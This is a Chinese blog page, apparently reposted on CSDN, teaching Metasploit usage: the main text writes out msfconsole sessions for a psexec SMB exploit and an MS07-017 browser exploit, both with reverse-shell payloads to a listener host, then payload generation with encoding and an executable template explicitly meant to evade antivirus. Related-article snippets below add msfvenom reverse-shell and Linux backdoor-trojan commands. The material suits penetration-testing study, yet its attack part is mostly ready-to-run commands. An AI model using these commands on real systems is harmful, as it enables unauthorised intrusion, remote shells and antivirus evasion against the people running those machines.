payload模块怎Linux,kali linux之Msf-exploit模块,生成payload

最新推荐文章于 2024-02-29 16:28:30 发布
最新推荐文章于 2024-02-29 16:28:30 发布
阅读量532 收藏
点赞数
文章标签: payload模块怎Linux
本文详细介绍了Metasploit框架中主动Exploit(如windows/smb/psexec)和被动Exploit(如windows/browser/ms07_017_ani_loadimage_chunksize)的使用方法,包括设置目标主机、端口、用户及密码,以及生成Payload的过程。同时,讲解了如何通过编码和模板生成免杀Payload,以绕过防护系统。
摘要由CSDN通过智能技术生成

Exploit模块

Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等))

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13

msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.10

msf5 exploit(windows/smb/psexec) > set LPORT 4444

msf5 exploit(windows/smb/psexec) > set SMBUSER admi1

msf5 exploit(windows/smb/psexec) > set SMBPASS 123

msf5 exploit(windows/smb/psexec) > exploit -j

Passive exploit(利用目标机器的客户端程序的漏洞来利用,客户端程序请求服务端时候,返回漏洞代码,加载payload,交出shell)

msf5 > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit -j

生成Payload

dd3a5d5a65f1601f605e6ef6c20d5a3b.png

generate

用法:生成  [选项]

选项:

-E             强制编码

-O            不推荐使用:'-o'选项的别名

-P             所需的有效负载总大小,自动生成适当的NOPsled长度

-S             生成Windows二进制文件时使用的新节名称

-b             要避免的字符列表示例:'\x00\xff'

-e             要使用的编码器

-f              输出格式:bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war

-h            显示此消息

-i             对有效负载进行编码的次数

-k            保留模板行为并将有效负载注入新线程

-n            在有效负载上添加[length]大小的nopsled

-o            输出文件名(否则为stdout)

-p            有效负载的平台

-s            NOP长度,EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行

-x            指定要用作模板的自定义可执行文件

generate---生成payload(这样生成的payload会有坏字符)

0b371d270de73f7b7d060ec2956567c2.png

encoders---generate生成payload的时候会智能的去选择encoders

04716215df9bf0d02990cc3a7f1a0c7c.png

generate -b '\x00'

47ae1f6db147cda8701f7615e3c7e512.png

generate -b '\x00\xff'

28f087ff980edefd63967aa151b6aebb.png

msf5 payload(windows/shell_bind_tcp) > generate -b '\x00' -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o /root/xx.exe(经过编码或者使用模板,可以简单的免杀)

898caf4e854e36bf03f20bada9fc23e9.png

dae9922831c35fd7fbc48b0deac0c168.png

额........比没混淆前好多了

02a1f1535cb7bffefbdcf0b32a8ea215.png

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

来源:https://www.cnblogs.com/Hydraxx/p/10488300.html

精灵之火
关注
msf生成linux shellcode,MSF-Shellcode生成和使用
weixin_33344952的博客
05-13 580
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9765
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
创建Metasploit Payloads
一个码农的笔记
01-31 1394
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
msfvenom制作payload
anan2175的博客
05-24 253
windows msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac msfvenom -a x86 --plat...
MSF——Payload模块(二)
dishan4749253的博客
09-07 1003
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、exploitpayload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payloadpayload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,expl...
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7807
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块
msf生成linux shellcode,使用msfpayload生成shellcode
weixin_30745053的博客
05-13 468
先查看下帮助 使用-l参数配合grep查看可以用的payloads 查询payload的必填参数信息(msfpayload payload_name o) 用键值对的方式传递参数值,并选择shellcode的导出格式(可以仔细看下-h的帮助提示信息) 我们发现这个shellcode里面存在很多\x00这个在字符串拷贝的时候会被截断,所以我们需要通过编码的方式去掉这些\x00 然后测试下shellc...
KaliMSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7406
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kalikali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录
weixin_28747937的博客
05-15 858
环境: 攻击机:192.168.200.101 //kali Linux 2020靶机:192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)1:msfconsole //进入me...
Kali linux 学习笔记(九十二)metasploit framework——payload 2020.4.25
闵行小鱼塘
04-27 773
使用exploit是为了将payload在目标机上执行
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
dzqxwzoe的博客
02-29 1520
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
生成msf常用payload
hl1293348082的专栏
04-07 2617
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
生成payload木1马 攻击 linux
weixin_54472394的博客
05-07 687
需要 1.开启httpd 2.生成payload 木马 3.启动msfdb run 监听 4. 5. 6. 开始 1.1: 开启httpd nmap install 参数说明 ADD 添加一个注册表项 -v 创建键值 -t 键值类型 -d 键值的值 // 0:关闭uac 1:开启uac -f 强制修改注册表项 收到 ...
payload模块Linux,msfvenom生成payload
weixin_42348109的博客
05-13 476
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?查看payloads: msfvenom --list payloads查看支持的文件格式:msfvenom --help-formats查看payload所需参数:msfvenom -p xxx --payload-options编码参数-e x86/shikata_ga_nai -i 5 -b "x00" //使用s...
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4805
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Kali msfconsole 生成payload问题
huang910101的博客
12-29 769
生成payload问题
【内网渗透】MSFexploit和pyload的基础使用
qq_37870222的博客
04-24 1535
【内网渗透】MSFexploit和pyload的基础使用1、连接MSFroot@kali:~# msfconsole2、显示所有攻击模块msf > show exploits |more3、寻找攻击模块msf > search ms08_0674、使用攻击模块msf > use /exploits/windows/tftp/tftpd32_long_filename5、显示pa...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
hyjcking的博客
12-01 1371
今天这台靶机涉及的知识点非常全面 1.有文件上传漏洞 2.基于cookie的sql注入漏洞 3.sqlmap的使用 4.用kali自带的木马生成工具weevely生成绕waf的一句话木马 5.使用绕waf的木马和普通gif结合生成gif图片木马, 6.使用knock敲开隐藏的服务器端口, 7.使用ltrace函数跟踪进程的库函数调用从而得到正确id, 8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
渗透工具——kalimsf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 7668
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
kalimsf模块报错Exploit completed, but no session was created.
05-16
这个错误可能是由于以下原因: 1. 目标机器上的防火墙或安全软件拦截了反向连接。你可以尝试使用其他的Payload或者设置合适的Payload参数来尝试绕过防火墙或安全软件的检测。 2. 目标机器的IP地址或端口号设置不正确。你需要确认目标机器的IP地址和端口号是否正确,并且与你设置的Payload参数一致。 3. 目标机器的漏洞不适用于当前的Exploit模块。你可以尝试使用其他的Exploit模块或者更换目标机器。 4. 目标机器已经被其他攻击者入侵并且正在运行其他的后门程序。你可以尝试使用其他的Payload或者更换目标机器。 如果你无法解决问题,建议你查看详细的错误日志,以便更好地理解问题的原因,并尝试在实际操作进行调试和排除问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值